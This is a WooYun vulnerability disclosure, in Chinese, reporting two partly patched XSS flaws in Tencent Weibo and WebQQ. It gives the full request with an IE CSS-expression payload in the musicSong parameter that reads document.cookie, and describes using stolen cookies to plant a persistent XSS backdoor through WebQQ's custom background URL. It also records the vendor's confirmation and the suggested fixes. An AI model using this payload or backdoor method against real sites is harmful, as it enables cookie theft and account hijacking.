当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013692

漏洞标题:PKAV腾讯专场 - 5. 两个未修补好的历史遗留XSS,(腾讯微博,WEBQQ各一处)

相关厂商:腾讯

漏洞作者: gainover

提交时间:2012-10-22 00:15

修复时间:2012-12-06 00:15

公开时间:2012-12-06 00:15

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-22: 细节已通知厂商并且等待厂商处理中
2012-10-22: 厂商已经确认,细节仅向厂商公开
2012-11-01: 细节向核心白帽子及相关领域专家公开
2012-11-11: 细节向普通白帽子公开
2012-11-21: 细节向实习白帽子公开
2012-12-06: 细节向公众公开

简要描述:

没修补完善的,打包一起发了吧,微博这个应该是修复第3次了。。

详细说明:

1. 首先是腾讯微博的这个问题,
历史轨迹
WooYun: 腾讯微博持久XSS漏洞
|
WooYun: 腾讯微博存储型XSS漏洞--看我这标题多普通
|
WooYun: 腾讯微博存储型XSS漏洞--看我这标题多普通2
------------------------------
再次测试时,这个点,还是存在问题,虽然没有先前的严重,但是在IE下还是可行的。
漏洞成因,没过滤", 导致可以用style="x:expression ... 的方式触发XSS。
如下图,插入后的代码。


musicSong参数

http://api.t.qq.com/old/publish.php
content	#送礼物#@gainover xxxxx! #A-a-aa-aaa-Irwin Goodman# xxxx
startTime	0
endTime	1350546646508
countType
viewModel
attips
sourcepic	http://qzonestyle.gtimg.cn/qzone/space_item/pre/13/82717_1.png
musicID	49976
musicSong	Irwin Goodman'"style="w:expression(if(!window.x){alert(document.cookie);window.x=1})"aaa=
musicSinger	mmmmm
musicLocation	http://stream10.qqmusic.qq.com/12049976.wma
musicShortUrl	1DmeVO
apiType	8
giftId	82717
eventId	5


播放音乐时,会弹个窗。。。


-----------------------------------
2. 至于WEBQQ这个。 敢把用自定义网页做背景的功能去掉么?在腾讯现有的架构下,只要拿到了cookies,这个拿网页做背景的功能,就是一个后门功能。
跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)( WooYun: 跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷) ) 中已经说明了相关问题。
这里我也不用脚本来做自动化的后门设置了。如有需要,相关利用代码和( WooYun: 腾讯WEBQQ的持久劫持 - 反射型XSS到XSS后门的实现 ) 基本一样。
手工一样可以完成后门设置,流程: 通过一个反射型的XSS,拿到cookies之后。可以进入web.qq.com页面,将WEB背景的自定义地址设置为一个腾讯的反射型XSS。


这样受害者下次使用WEBQQ时,就会触发这个后门。

漏洞证明:

见详细说明。

修复方案:

1. 对于微博的问题,将相关的几个参数中,双引号也加以过滤。中国的XP+IE的份额还是那么大,危害还是挺大的。
2. WEBQQ这个,建议废弃掉这个用网页做自定义背景的功能吧。如果一定要保留这个功能。建议让官方提供可靠的背景网页,并在保存自定义背景地址时进行正则判断。

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-10-22 10:17

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无